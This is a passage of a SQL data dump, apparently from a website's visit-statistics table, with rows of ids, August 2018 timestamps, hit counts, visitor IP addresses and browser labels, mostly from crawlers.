1644,1,1,0,0,'54.36.148.103','other'),(296045,1535482319,1,1,0,0,'54.36.148.210','other'),(296046,1535482366,1,1,0,0,'54.36.148.189','other'),(296047,1535482600,1,1,0,0,'54.36.148.144','other'),(296048,1535482702,2,0,2,0,'66.249.66.155',''),(296049,1535482778,1,1,0,0,'157.55.39.172','other'),(296050,1535483058,1,1,0,0,'54.36.149.104','other'),(296051,1535483275,1,1,0,0,'54.36.149.59','other'),(296052,1535483948,1,0,1,0,'66.249.66.155',''),(296053,1535484045,1,1,0,0,'95.135.153.132','chrome'),(296054,1535484173,2,0,2,0,'66.249.66.157',''),(296055,1535485163,1,1,0,0,'54.36.149.46','other'),(296056,1535485185,1,1,0,0,'54.36.149.7','other'),(296057,1535485201,1,1,0,0,'54.36.148.191','other'),(296058,1535485312,1,1,0,0,'54.36.148.235','other'),(296059,1535485501,2,0,2,0,'66.249.66.157',''),(296060,1535485615,2,0,2,0,'66.249.66.156',''),(296061,1535485771,1,1,0,0,'54.36.148.205','other'),(296062,1535485917,1,1,0,0,'54.36.148.253','other'),(296063,1535486003,1,1,0,0,'54.36.148.238','other'),(296064,1535486500,1,1,0,0,'54.36.148.81','other'),(296065,1535486579,1,1,0,0,'54.36.148.78','other'),(296066,1535486707,1,1,0,0,'54.36.148.197','other'),(296067,1535486781,1,1,0,0,'54.36.148.237','other'),(296068,1535486840,1,1,0,0,'54.36.148.42','other'),(296069,1535486933,1,1,0,0,'54.36.148.206','other'),(296070,1535487024,1,1,0,0,'54.36.148.104','other'),(296071,1535487392,1,1,0,0,'54.36.148.227','other'),(296072,1535488388,1,1,0,0,'54.36.149.105','other'),(296073,1535488506,1,1,0,0,'54.36.149.104','other'),(296074,1535488805,1,1,0,0,'54.36.148.69','other'),(296075,1535488928,1,1,0,0,'141.8.142.74','other'),(296076,1535489073,1,1,0,0,'54.36.148.30','other'),(296077,1535489464,1,1,0,0,'54.36.149.37','other'),(296078,1535489562,1,1,0,0,'54.36.148.46','other'),(296079,1535489813,27,27,0,0,'173.212.242.246','other'),(296080,1535489848,1,1,0,0,'54.36.148.182','other'),(296081,1535490227,1,1,0,0,'54.36.148.19','other'),(296082,1535490532,1,1,0,0,'54.36.148.13','other'),(296083,1535490608,1,1,0,0,'178.154.200.41','other'),(296084,1535490753,1,1,0,0,'54.36.148.128','other'),(296085,1535490876,1,1,0,0,'54.36.148.105','other'),(296086,1535491241,1,1,0,0,'54.36.148.225','other'),(296087,1535491271,1,1,0,0,'216.244.66.241','other'),(296088,1535491313,1,1,0,0,'54.36.148.172','other'),(296089,1535491593,1,1,0,0,'8.29.198.27','other'),(296090,1535491601,1,1,0,0,'54.36.149.26','other'),(296091,1535491786,1,1,0,0,'54.36.148.113','other'),(296092,1535492250,1,1,0,0,'54.36.149.61','other'),(296093,1535492350,1,1,0,0,'54.36.148.147','other'),(296094,1535492390,1,1,0,0,'54.36.148.72','other'),(296095,1535492423,1,1,0,0,'54.36.148.73','other'),(296096,1535493006,1,1,0,0,'54.36.148.113','other'),(296097,1535493016,1,1,0,0,'216.244.66.241','other'),(296098,1535493141,1,1,0,0,'54.36.149.107','other'),(296099,1535493294,1,1,0,0,'54.36.149.48','other'),(296100,1535494040,1,1,0,0,'54.36.149.28','other'),(296101,1535494405,1,1,0,0,'54.36.148.75','other'),(296102,1535495003,1,1,0,0,'54.36.148.219','other'),(296103,1535495165,1,1,0,0,'178.154.171.88','other'),(296104,1535495319,2,2,0,0,'216.244.66.241','other'),(296105,1535495529,2,0,2,0,'66.249.66.156',''),(296106,1535495691,1,0,1,0,'66.249.66.155',''),(296107,1535495735,1,1,0,0,'54.36.148.174','other'),(296108,1535495768,1,1,0,0,'66.249.66.157','chrome'),(296109,1535495770,1,1,0,0,'66.249.66.59','chrome'),(296110,1535495950,1,1,0,0,'95.163.255.164','other'),(296111,1535496990,1,1,0,0,'66.249.66.156','chrome'),(296112,1535497116,1,1,0,0,'54.36.148.232','other'),(296113,1535497133,1,1,0,0,'54.36.149.79','other'),(296114,1535497170,1,1,0,0,'54.36.149.95','other'),(296115,1535497318,1,1,0,0,'54.36.149.80','other'),(296116,1535497323,2,0,2,0,'66.249.66.157',''),(296117,1535498054,1,1,0,0,'54.36.149.12','other'),(296118,1535498332,1,1,0,0,'54.36.148.188','other'),(296119,1535498410,1,1,0,0,'54.36.148.190','other'),(296120,1535498502,1,1,0,0,'46.42.145.136','msie'),(296121,1535498767,1,0,1,0,'66.249.66.155',''),(296122,1535499029,1,1,0,0,'54.36.148.81','other'),(296123,1535499401,1,1,0,0,'54.36.148.128','other'),(296124,1535499452,1,1,0,0,'54.36.148.123','other'),(296125,1535499604,1,0,1,0,'66.249.66.156',''),(296126,1535499751,1,1,0,0,'54.36.149.58','other'),(296127,1535499855,1,1,0,0,'54.36.149.86','other'),(296128,1535500013,1,1,0,0,'54.36.148.233','other'),(296129,1535501039,1,1,0,0,'54.36.149.96','other'),(296130,1535501138,1,1,0,0,'54.36.149.66','other'),(296131,1535501306,1,1,0,0,'54.36.149.25','other'),(296132,1535501512,1,1,0,0,'54.36.149.89','other'),(296133,1535501847,1,1,0,0,'54.36.148.186','other'),(296134,1535502019,1,1,0,0,'54.36.148.125','other'),(296135,1535502427,2,2,0,0,'141.8.142.74','other'),(296136,1535502456,1,1,0,0,'8.29.198.26','other'),(296137,1535502513,1,0,1,0,'66.249.66.157',''),(296138,1535502680,1,1,0,0,'54.36.148.91','other'),(296139,1535502742,1,1,0,0,'87.250.224.46','other'),(296140,1535503339,1,1,0,0,'54.36.149.66','other'),(296141,1535503341,1,1,0,0,'54.36.148.17','other'),(296142,1535503533,1,1,0,0,'54.36.148.197','other'),(296143,1535503780,1,1,0,0,'54.36.148.161','other'),(296144,1535504232,1,1,0,0,'54.36.148.177','other'),(296145,1535504278,1,1,0,0,'54.36.148.66','other'),(296146,1535504359,1,1,0,0,'54.36.148.247','other'),(296147,1535504645,1,1,0,0,'54.36.149.81','other'),(296148,1535504678,1,1,0,0,'54.36.148.55','other'),(296149,1535504811,1,0,1,0,'66.249.66.156',''),(296150,1535505017,1,1,0,0,'141.8.142.74','other'),(296151,1535505111,1,1,0,0,'54.36.148.142','other'),(296152,1535505137,2,0,2,0,'66.249.66.155',''),(296153,1535505276,1,0,1,0,'66.249.66.157',''),(296154,1535505625,2,2,0,0,'216.244.66.241','other'),(296155,1535505855,1,1,0,0,'54.36.148.77','other'),(296156,1535505991,1,1,0,0,'54.36.148.163','other'),(296157,1535506023,1,1,0,0,'54.36.148.183','other'),(296158,1535506057,1,1,0,0,'54.36.148.157','other'),(296159,1535506150,1,1,0,0,'54.36.149.34','other'),(296160,1535506171,1,1,0,0,'80.211.38.174','firefox'),(296162,1535506268,1,1,0,0,'54.36.148.192','other'),(296163,1535506271,1,1,0,0,'40.77.167.46','other'),(296164,1535506602,1,1,0,0,'54.36.148.50','other'),(296165,1535506803,1,1,0,0,'66.249.66.157','chrome'),(296166,1535506805,1,1,0,0,'66.249.66.61','chrome'),(296167,1535506902,1,0,1,0,'66.249.66.155',''),(296168,1535506926,1,1,0,0,'54.36.148.70','other'),(296169,1535507250,1,1,0,0,'54.36.148.116','other'),(296170,1535507276,1,1,0,0,'54.36.148.135','other'),(296171,1535507465,1,1,0,0,'54.36.148.236','other'),(296172,1535507607,1,1,0,0,'54.36.148.180','other'),(296173,1535507769,1,1,0,0,'216.244.66.241','other'),(296174,1535508179,1,1,0,0,'54.36.149.47','other'),(296175,1535508622,1,1,0,0,'178.154.171.88','other'),(296176,1535508625,1,1,0,0,'37.9.113.182','other'),(296177,1535508676,1,1,0,0,'54.36.148.160','other'),(296178,1535508839,1,0,1,0,'66.249.66.61',''),(296179,1535508953,1,1,0,0,'54.36.148.114','other'),(296180,1535508964,1,1,0,0,'54.36.149.27','other'),(296181,1535509106,1,0,1,0,'66.249.66.156',''),(296182,1535509177,1,1,0,0,'95.28.33.181','msie'),(296183,1535509179,1,1,0,0,'79.111.54.49','msie'),(296184,1535509236,1,1,0,0,'40.77.167.46','other'),(296185,1535509318,1,1,0,0,'54.36.149.96','other'),(296186,1535509853,1,1,0,0,'54.36.148.190','other'),(296187,1535509959,1,1,0,0,'54.36.148.23','other'),(296188,1535510090,1,0,1,0,'66.249.66.157',''),(296189,1535510313,1,1,0,0,'54.36.148.69','other'),(296190,1535510368,6,6,0,0,'5.9.155.37','other'),(296191,1535510501,1,1,0,0,'180.76.15.20','other'),(296192,1535510608,1,1,0,0,'216.244.66.241','other'),(296193,1535510725,1,1,0,0,'54.36.148.121','other'),(296194,1535511107,1,1,0,0,'54.36.148.12','other'),(296195,1535511403,4,4,0,0,'54.165.59.7','other'),(296196,1535511623,1,1,0,0,'54.36.148.255','other'),(296197,1535511843,1,1,0,0,'54.36.149.29','other'),(296198,1535512059,1,1,0,0,'54.36.149.41','other'),(296199,1535512142,1,1,0,0,'54.36.148.164','other'),(296200,1535512257,1,1,0,0,'54.36.148.19','other'),(296201,1535512615,1,1,0,0,'54.36.149.31','other'),(296202,1535512700,1,1,0,0,'54.36.149.0','other'),(296203,1535513021,1,1,0,0,'54.36.149.17','other'),(296204,1535513027,1,1,0,0,'54.36.148.77','other'),(296205,1535513159,5,5,0,0,'95.216.38.186','other'),(296206,1535513295,1,1,0,0,'8.29.198.26','other'),(296207,1535513405,1,1,0,0,'54.36.148.137','other'),(296208,1535513568,1,1,0,0,'54.36.148.224','other'),(296209,1535513705,1,1,0,0,'54.36.149.85','other'),(296210,1535513895,2,2,0,0,'141.8.142.74','other'),(296211,1535513952,1,1,0,0,'54.36.148.57','other'),(296212,1535514049,1,1,0,0,'54.165.59.7','other'),(296213,1535514339,1,0,1,0,'66.249.66.155',''),(296214,1535514979,1,1,0,0,'54.36.148.105','other'),(296215,1535515116,1,1,0,0,'178.154.171.88','other'),(296216,1535515440,1,1,0,0,'54.36.148.255','other'),(296217,1535515808,1,1,0,0,'141.8.142.74','other'),(296218,1535515885,1,1,0,0,'54.36.148.212','other'),(296219,1535515926,1,1,0,0,'54.36.148.52','other'),(296220,1535515942,1,1,0,0,'54.36.149.62','other'),(296221,1535515969,3,0,3,0,'66.249.66.156',''),(296222,1535515974,1,1,0,0,'54.36.149.26','other'),(296223,1535516107,1,0,1,0,'66.249.66.155',''),(296224,1535516261,1,1,0,0,'54.36.148.39','other'),(296225,1535516768,1,1,0,0,'54.36.149.4','other'),(296226,1535516831,1,1,0,0,'54.36.148.125','other'),(296227,1535516904,1,1,0,0,'54.36.148.17','other'),(296228,1535516937,1,1,0,0,'66.249.66.155','chrome'),(296229,1535516938,1,1,0,0,'66.249.66.59','chrome'),(296230,1535517242,1,1,0,0,'54.36.148.75','other'),(296231,1535517285,1,1,0,0,'54.36.148.86','other'),(296232,1535517656,1,1,0,0,'54.36.148.156','other'),(296233,1535517719,1,1,0,0,'66.249.66.57','chrome'),(296234,1535518215,1,1,0,0,'216.244.66.241','other'),(296235,1535518266,1,1,0,0,'54.36.149.11','other'),(296236,1535518389,1,1,0,0,'54.36.148.25','other'),(296237,1535518405,2,0,2,0,'66.249.66.155',''),(296238,1535518556,1,1,0,0,'91.196.177.46','chrome'),(296239,1535518624,2,2,0,0,'54.165.59.7','other'),(296240,1535518661,1,1,0,0,'54.36.148.19','other'),(296241,1535518882,1,1,0,0,'141.8.142.74','other'),(296242,1535519076,1,1,0,0,'54.36.148.55','other'),(296243,1535519256,1,1,0,0,'91.209.11.236','other'),(296244,1535519317,2,0,2,0,'66.249.66.155',''),(296245,1535519330,1,1,0,0,'54.36.148.122','other'),(296246,1535519455,1,1,0,0,'54.36.148.98','other'),(296247,1535519719,1,1,0,0,'54.36.149.8','other'),(296248,1535519755,1,1,0,0,'54.36.148.24','other'),(296249,1535520014,1,1,0,0,'54.36.149.58','other'),(296250,1535520140,1,1,0,0,'54.36.148.204','other'),(296251,1535520325,1,1,0,0,'54.36.148.173','other'),(296252,1535520482,1,1,0,0,'54.36.149.107','other'),(296253,1535520605,1,1,0,0,'91.196.177.46','chrome'),(296254,1535520723,1,1,0,0,'46.188.73.92','chrome'),(296255,1535520748,3,3,0,0,'216.244.66.241','other'),(296256,1535520844,1,1,0,0,'54.36.148.13','other'),(296257,1535520943,1,1,0,0,'141.8.142.74','other'),(296258,1535521053,1,1,0,0,'54.36.148.12','other'),(296259,1535521083,1,1,0,0,'54.36.148.253','other'),(296260,1535521318,2,0,2,0,'66.249.66.155',''),(296261,1535521327,1,1,0,0,'207.46.13.109','other'),(296262,1535521362,1,0,1,0,'66.249.66.156',''),(296263,1535521439,1,1,0,0,'54.36.148.49','other'),(296264,1535521531,1,1,0,0,'54.36.149.78','other'),(296265,1535521662,1,1,0,0,'54.36.149.58','other'),(296266,1535521725,1,1,0,0,'54.36.149.74','other'),(296267,1535522237,1,1,0,0,'54.36.148.113','other'),(296268,1535522349,1,1,0,0,'141.8.142.74','other'),(296269,1535522389,1,1,0,0,'51.255.65.46','other'),(296270,1535522497,1,1,0,0,'54.36.148.89','other'),(296271,1535523131,1,1,0,0,'54.36.149.3','other'),(296272,1535523142,1,1,0,0,'54.36.148.52','other'),(296273,1535523287,1,1,0,0,'40.77.167.219','other'),(296274,1535523309,1,0,1,0,'66.249.66.57',''),(296275,1535523710,1,1,0,0,'54.36.148.251','other'),(296276,1535523833,1,0,1,0,'66.249.66.157',''),(296277,1535523854,1,1,0,0,'54.36.148.213','other'),(296278,1535524053,1,0,1,0,'66.249.66.61',''),(296279,1535524141,1,1,0,0,'8.29.198.26','other'),(296280,1535524203,1,0,1,0,'66.249.66.156',''),(296281,1535524365,2,2,0,0,'91.196.177.15','chrome'),(296282,1535524497,1,1,0,0,'141.8.142.74','other'),(296283,1535524505,1,1,0,0,'54.36.149.30','other'),(296284,1535524944,1,1,0,0,'54.36.148.122','other'),(296285,1535525355,1,1,0,0,'54.36.148.131','other'),(296286,1535525359,2,0,2,0,'66.249.66.157',''),(296287,1535525582,1,1,0,0,'37.73.162.142','chrome'),(296288,1535525699,1,1,0,0,'54.36.148.179','other'),(296289,1535525773,1,1,0,0,'54.36.148.137','other'),(296290,1535525845,1,1,0,0,'141.8.142.74','other'),(296291,1535525849,1,1,0,0,'178.154.171.88','other'),(296292,1535526154,1,1,0,0,'54.36.148.196','other'),(296293,1535526256,2,2,0,0,'54.36.149.97','other'),(296294,1535526308,15,15,0,0,'167.114.219.41','other'),(296295,1535526348,1,1,0,0,'194.44.104.8','chrome'),(296296,1535526394,1,1,0,0,'54.36.148.39','other'),(296297,1535527050,1,1,0,0,'194.88.153.38','chrome'),(296298,1535527180,1,1,0,0,'54.36.148.84','other'),(296299,1535527417,1,1,0,0,'54.36.149.46','other'),(296300,1535527554,1,1,0,0,'141.8.142.74','other'),(296301,1535527850,1,1,0,0,'54.36.148.193','other'),(296302,1535528031,1,1,0,0,'40.77.167.46','other'),(296303,1535528058,1,1,0,0,'40.77.167.219','other'),(296304,1535528224,1,1,0,0,'54.36.149.80','other'),(296305,1535528382,1,1,0,0,'54.36.148.63','other'),(296306,1535528392,1,1,0,0,'37.54.141.229','firefox'),(296307,1535528454,1,1,0,0,'54.36.148.36','other'),(296308,1535528621,1,1,0,0,'54.36.149.50','other'),(296309,1535528689,1,1,0,0,'54.36.149.99','other'),(296310,1535528916,1,1,0,0,'141.8.142.74','other'),(296311,1535529080,1,1,0,0,'54.36.148.137','other'),(296312,1535529160,1,1,0,0,'54.36.148.216','other'),(296313,1535529332,1,1,0,0,'216.244.66.241','other'),(296314,1535529403,1,1,0,0,'54.36.149.97','other'),(296315,1535529435,1,1,0,0,'91.196.177.110','chrome'),(296316,1535529546,1,1,0,0,'178.95.67.148','chrome'),(296317,1535529586,1,1,0,0,'54.36.149.79','other'),(296318,1535530530,1,1,0,0,'54.36.149.67','other'),(296319,1535530709,1,1,0,0,'54.36.148.128','other'),(296320,1535530741,1,1,0,0,'216.244.66.241','other'),(296321,1535530965,1,1,0,0,'66.249.66.57','chrome'),(296322,1535531002,1,1,0,0,'91.196.178.162','chrome'),(296323,1535531335,1,1,0,0,'178.154.200.41','other'),(296324,1535531641,1,1,0,0,'54.36.148.210','other'),(296325,1535531964,1,1,0,0,'31.134.209.240','chrome'),(296326,1535532254,1,1,0,0,'54.36.149.98','other'),(296327,1535532847,1,1,0,0,'54.36.148.13','other'),(296328,1535532849,2,2,0,0,'91.196.178.80','chrome'),(296329,1535532994,1,1,0,0,'54.36.148.117','other'),(296330,1535533087,1,1,0,0,'178.154.171.88','other'),(296331,1535533262,1,1,0,0,'54.36.148.238','other'),(296332,1535533355,1,0,1,0,'66.249.66.157',''),(296333,1535533378,1,1,0,0,'216.244.66.241','other'),(296334,1535533464,1,0,1,0,'66.249.66.155',''),(296335,1535533705,1,0,1,0,'66.249.66.156',''),(296336,1535533825,1,1,0,0,'91.237.107.12','chrome'),(296337,1535533884,1,1,0,0,'92.113.73.150','chrome'),(296338,1535533938,1,1,0,0,'54.36.148.234','other'),(296339,1535533941,2,2,0,0,'40.77.167.219','other'),(296340,1535533956,2,2,0,0,'141.8.142.74','other'),(296341,1535534055,1,1,0,0,'54.36.148.81','other'),(296342,1535534873,1,1,0,0,'141.8.142.74','other'),(296343,1535534985,1,1,0,0,'8.29.198.26','other'),(296344,1535535122,1,1,0,0,'54.36.148.95','other'),(296345,1535535203,1,0,1,0,'66.249.66.155',''),(296346,1535535329,1,1,0,0,'92.113.73.150','chrome'),(296347,1535535732,1,1,0,0,'54.36.149.7','other'),(296348,1535535936,1,1,0,0,'91.196.178.174','chrome'),(296349,1535536754,1,1,0,0,'54.36.148.108','other'),(296350,1535536896,1,1,0,0,'54.36.148.130','other'),(296351,1535536920,2,2,0,0,'216.244.66.241','other'),(296352,1535537213,1,0,1,0,'66.249.66.157',''),(296353,1535537241,1,1,0,0,'66.249.66.157','chrome'),(296354,1535537377,1,1,0,0,'54.36.149.40','other'),(296355,1535537711,1,1,0,0,'178.93.148.12','chrome'),(296356,1535537767,1,1,0,0,'54.36.148.42','other'),(296357,1535537781,1,1,0,0,'199.58.86.206','other'),(296358,1535537842,1,1,0,0,'54.36.149.69','other'),(296359,1535537891,1,1,0,0,'54.36.149.1','other'),(296360,1535537971,1,1,0,0,'54.36.148.217','other'),(296361,1535537995,1,1,0,0,'54.36.148.61','other'),(296362,1535538029,1,1,0,0,'54.36.148.226','other'),(296363,1535538094,1,0,1,0,'66.249.66.156',''),(296364,1535538112,2,2,0,0,'93.170.135.252','chrome'),(296365,1535538272,1,1,0,0,'54.36.148.36','other'),(296366,1535538547,1,1,0,0,'54.36.148.95','other'),(296367,1535538778,1,0,1,0,'66.249.76.108',''),(296368,1535538788,1,0,1,0,'66.249.66.155',''),(296369,1535538863,1,1,0,0,'54.36.148.203','other'),(296370,1535539029,1,1,0,0,'91.196.178.162','chrome'),(296371,1535539189,1,1,0,0,'54.36.149.54','other'),(296372,1535539977,1,1,0,0,'54.36.148.87','other'),(296373,1535540271,1,1,0,0,'54.36.149.38','other'),(296374,1535540303,1,1,0,0,'54.36.148.248','other'),(296375,1535540422,1,1,0,0,'54.36.148.48','other'),(296376,1535540684,1,1,0,0,'5.9.98.234','other'),(296377,1535540789,1,1,0,0,'54.36.149.46','other'),(296378,1535540980,1,1,0,0,'178.154.171.88','other'),(296379,1535541219,1,1,0,0,'54.36.149.83','other'),(296380,1535541847,1,1,0,0,'54.36.149.69','other'),(296381,1535541870,2,2,0,0,'141.8.142.74','other'),(296382,1535542543,1,1,0,0,'54.36.148.162','other'),(296383,1535542577,1,0,1,0,'66.249.66.156',''),(296384,1535542621,2,0,2,0,'66.249.66.155',''),(296385,1535542822,1,1,0,0,'54.36.148.137','other'),(296386,1535542868,1,1,0,0,'54.36.149.73','other'),(296387,1535542987,1,1,0,0,'54.36.149.67','other'),(296388,1535543177,1,1,0,0,'66.249.66.57','chrome'),(296389,1535543238,1,1,0,0,'54.36.148.17','other'),(296390,1535543319,1,1,0,0,'54.36.148.94','other'),(296391,1535543493,1,1,0,0,'54.36.148.61','other'),(296392,1535543551,2,0,2,0,'66.249.66.157',''),(296393,1535544118,1,1,0,0,'54.36.149.25','other'),(296394,1535544137,1,1,0,0,'54.36.148.74','other'),(296395,1535544390,1,0,1,0,'66.249.66.155',''),(296396,1535544941,1,1,0,0,'54.36.148.221','other'),(296397,1535545021,1,1,0,0,'54.36.148.244','other'),(296398,1535545106,1,0,1,0,'66.249.66.59',''),(296399,1535545692,1,1,0,0,'54.36.148.124','other'),(296400,1535545759,1,1,0,0,'141.8.142.74','other'),(296401,1535545871,1,1,0,0,'8.29.198.25','other'),(296402,1535546299,1,1,0,0,'87.250.224.46','other'),(296403,1535546387,2,2,0,0,'54.36.148.90','other'),(296404,1535546579,1,1,0,0,'54.36.149.13','other'),(296405,1535546735,1,1,0,0,'54.36.149.14','other'),(296406,1535546935,1,0,1,0,'66.249.66.157',''),(296407,1535547447,2,2,0,0,'91.196.177.15','chrome'),(296408,1535547806,1,1,0,0,'54.36.149.86','other'),(296409,1535548013,1,1,0,0,'54.36.148.158','other'),(296410,1535548113,1,1,0,0,'54.36.148.13','other'),(296411,1535548422,1,1,0,0,'54.36.148.108','other'),(296412,1535548528,2,2,0,0,'178.154.171.88','other'),(296413,1535548709,1,1,0,0,'54.36.148.195','other'),(296414,1535548779,1,1,0,0,'54.36.148.128','other'),(296415,1535548886,1,1,0,0,'54.36.148.214','other'),(296416,1535548913,1,1,0,0,'54.36.148.217','other'),(296417,1535549074,1,1,0,0,'141.8.142.74','other'),(296418,1535549239,1,1,0,0,'54.36.149.0','other'),(296419,1535549241,1,1,0,0,'91.196.177.15','chrome'),(296420,1535549289,1,1,0,0,'46.150.75.204','chrome'),(296421,1535549340,1,1,0,0,'54.36.148.204','other'),(296422,1535549799,1,1,0,0,'91.196.178.88','chrome'),(296423,1535549885,1,1,0,0,'54.36.149.53','other'),(296424,1535550195,1,1,0,0,'54.36.148.168','other'),(296425,1535550380,2,2,0,0,'141.8.142.74','other'),(296426,1535550499,1,0,1,0,'66.249.66.155',''),(296427,1535550647,1,1,0,0,'54.36.148.110','other'),(296428,1535551306,1,1,0,0,'178.133.45.27','chrome'),(296429,1535551331,1,1,0,0,'54.36.149.91','other'),(296430,1535551468,7,7,0,0,'40.77.167.219','other'),(296431,1535551473,1,1,0,0,'95.163.255.109','other'),(296432,1535551476,18,18,0,0,'207.46.13.105','other'),(296433,1535551478,1,1,0,0,'95.163.255.108','other'),(296434,1535551493,17,17,0,0,'157.55.39.222','other'),(296435,1535551496,1,1,0,0,'95.163.255.116','other'),(296436,1535551503,1,1,0,0,'95.163.255.118','other'),(296437,1535551511,11,11,0,0,'40.77.167.46','other'),(296438,1535551714,1,1,0,0,'54.36.148.204','other'),(296439,1535551977,1,0,1,0,'66.249.66.157',''),(296440,1535552128,1,1,0,0,'54.36.148.248','other'),(296441,1535552411,1,1,0,0,'188.230.43.254','other'),(296442,1535552426,2,2,0,0,'91.196.177.46','chrome'),(296443,1535552774,1,1,0,0,'54.36.148.239','other'),(296444,1535552835,1,1,0,0,'54.36.149.82','other'),(296445,1535553363,1,1,0,0,'54.36.148.156','other'),(296446,1535553577,1,1,0,0,'54.36.148.114','other'),(296447,1535553624,1,1,0,0,'54.36.149.53','other'),(296448,1535553712,1,1,0,0,'54.36.148.235','other'),(296449,1535553916,1,1,0,0,'54.36.149.42','other'),(296450,1535554257,1,1,0,0,'54.36.148.197','other'),(296451,1535554404,1,1,0,0,'178.154.171.88','other'),(296452,1535554414,1,1,0,0,'141.8.142.74','other'),(296453,1535554434,1,1,0,0,'54.36.148.207','other'),(296454,1535554557,1,1,0,0,'54.36.148.64','other'),(296455,1535554622,2,2,0,0,'78.25.19.218','chrome'),(296456,1535554812,1,1,0,0,'188.230.43.254','other'),(296457,1535555067,1,1,0,0,'54.36.148.210','other'),(296458,1535555231,1,1,0,0,'54.36.148.218','other'),(296459,1535555519,1,1,0,0,'54.36.148.75','other'),(296460,1535555587,1,0,1,0,'66.249.66.157',''),(296461,1535555778,1,1,0,0,'54.36.148.197','other'),(296462,1535555846,1,1,0,0,'54.36.149.61','other'),(296463,1535556024,1,1,0,0,'176.122.125.116','chrome'),(296464,1535556040,1,1,0,0,'216.244.66.241','other'),(296465,1535556146,1,1,0,0,'54.36.148.181','other'),(296466,1535556525,1,1,0,0,'54.36.149.45','other'),(296467,1535556535,1,1,0,0,'54.36.148.187','other'),(296468,1535556561,1,1,0,0,'54.36.148.185','other'),(296469,1535556605,1,1,0,0,'54.36.148.81','other'),(296470,1535556736,1,0,1,0,'66.249.66.157',''),(296471,1535556792,1,1,0,0,'8.29.198.25','other'),(296472,1535556800,1,1,0,0,'54.36.148.127','other'),(296473,1535556886,1,1,0,0,'40.77.167.46','other'),(296474,1535557000,1,1,0,0,'54.36.148.29','other'),(296475,1535557020,1,1,0,0,'188.230.43.254','other'),(296476,1535557053,1,0,1,0,'66.249.66.155',''),(296477,1535557126,1,1,0,0,'141.8.142.74','other'),(296478,1535557130,1,1,0,0,'178.154.171.88','other'),(296479,1535558276,1,1,0,0,'54.36.149.79','other'),(296480,1535558455,1,1,0,0,'54.36.148.83','other'),(296481,1535558516,1,1,0,0,'54.36.148.240','other'),(296482,1535559015,1,1,0,0,'188.230.43.254','other'),(296483,1535559051,1,1,0,0,'54.36.149.101','other'),(296484,1535559392,1,1,0,0,'54.36.148.89','other'),(296485,1535559582,1,0,1,0,'66.249.66.59',''),(296486,1535559592,1,1,0,0,'54.36.148.58','other'),(296487,1535559650,1,1,0,0,'54.36.148.171','other'),(296488,1535559721,1,1,0,0,'54.36.148.30','other'),(296489,1535560042,1,1,0,0,'54.36.149.89','other'),(296490,1535560315,1,1,0,0,'54.36.148.187','other'),(296491,1535560539,1,1,0,0,'54.36.148.82','other'),(296492,1535561203,1,1,0,0,'66.249.66.61','chrome'),(296493,1535561280,1,1,0,0,'54.36.148.164','other'),(296494,1535561317,1,1,0,0,'54.36.148.170','other'),(296495,1535561413,1,1,0,0,'188.230.43.254','other'),(296496,1535561427,1,1,0,0,'185.191.204.9','chrome'),(296497,1535561508,1,1,0,0,'54.36.149.31','other'),(296498,1535561981,1,1,0,0,'54.36.148.28','other'),(296499,1535562162,1,1,0,0,'54.36.148.126','other'),(296500,1535562185,1,1,0,0,'87.250.224.46','other'),(296501,1535562257,1,1,0,0,'54.36.148.190','other'),(296502,1535562412,1,1,0,0,'64.246.165.150','firefox'),(296503,1535562527,1,1,0,0,'54.36.148.233','other'),(296504,1535562855,1,1,0,0,'54.36.149.106','other'),(296505,1535563254,1,1,0,0,'54.36.148.173','other'),(296506,1535563548,1,1,0,0,'54.36.148.108','other'),(296507,1535563805,1,1,0,0,'188.230.43.254','other'),(296508,1535564094,1,1,0,0,'54.36.149.31','other'),(296509,1535564096,1,0,1,0,'66.249.66.156',''),(296510,1535564098,1,1,0,0,'54.36.148.61','other'),(296511,1535564404,1,1,0,0,'54.36.149.84','other'),(296512,1535564771,1,1,0,0,'91.196.178.78','firefox'),(296513,1535564784,1,1,0,0,'54.36.148.68','other'),(296514,1535564819,1,0,1,0,'66.249.66.157',''),(296515,1535565011,1,1,0,0,'141.8.142.74','other'),(296516,1535565200,1,1,0,0,'54.36.148.104','other'),(296517,1535565288,1,1,0,0,'54.36.148.128','other'),(296518,1535565329,1,0,1,0,'66.249.66.59',''),(296519,1535565398,1,0,1,0,'66.249.66.156',''),(296520,1535565745,1,1,0,0,'54.36.148.56','other'),(296521,1535565793,1,1,0,0,'54.188.36.86','chrome'),(296522,1535565882,1,1,0,0,'54.36.149.52','other'),(296523,1535566063,1,1,0,0,'54.36.148.233','other'),(296524,1535566080,1,1,0,0,'54.36.148.14','other'),(296525,1535566214,1,1,0,0,'188.230.43.254','other'),(296526,1535566423,1,1,0,0,'54.36.148.119','other'),(296527,1535566536,1,1,0,0,'54.36.148.105','other'),(296528,1535566717,1,1,0,0,'54.36.148.90','other'),(296529,1535566788,1,1,0,0,'54.36.148.60','other'),(296530,1535566829,1,1,0,0,'54.36.149.88','other'),(296531,1535566921,1,1,0,0,'216.244.66.241','other'),(296532,1535567034,1,1,0,0,'91.196.178.74','chrome'),(296533,1535567039,1,0,1,0,'66.249.66.57',''),(296534,1535567136,1,0,1,0,'66.249.66.59',''),(296535,1535567160,1,0,1,0,'66.249.66.157',''),(296536,1535567163,1,0,1,0,'66.249.66.156',''),(296537,1535567194,1,1,0,0,'157.55.39.16','other'),(296538,1535567196,1,1,0,0,'54.36.148.165','other'),(296539,1535567667,1,1,0,0,'8.29.198.26','other'),(296540,1535567974,1,1,0,0,'54.36.149.3','other'),(296541,1535568309,1,1,0,0,'54.36.148.210','other'),(296542,1535568473,1,1,0,0,'54.36.148.174','other'),(296543,1535568478,1,1,0,0,'92.113.55.166','chrome'),(296544,1535568727,1,1,0,0,'157.55.39.227','other'),(296545,1535568752,1,1,0,0,'54.36.149.78','other'),(296546,1535568777,1,1,0,0,'54.36.148.212','other'),(296547,1535569250,1,1,0,0,'91.124.181.19','chrome'),(296548,1535569381,2,2,0,0,'141.8.142.74','other'),(296549,1535569383,1,1,0,0,'178.154.171.88','other'),(296550,1535569421,1,1,0,0,'54.36.149.96','other'),(296551,1535569525,1,1,0,0,'95.135.153.132','chrome'),(296552,1535569708,1,1,0,0,'54.36.148.94','other'),(296553,1535569991,1,0,1,0,'66.249.66.57',''),(296554,1535570212,1,1,0,0,'54.36.149.25','other'),(296555,1535570398,1,1,0,0,'54.36.148.12','other'),(296556,1535570573,1,1,0,0,'141.8.142.74','other'),(296557,1535570738,1,1,0,0,'178.154.171.88','other'),(296558,1535570835,1,1,0,0,'54.36.148.118','other'),(296559,1535570936,1,1,0,0,'66.249.66.59','chrome'),(296560,1535570959,1,1,0,0,'54.36.148.4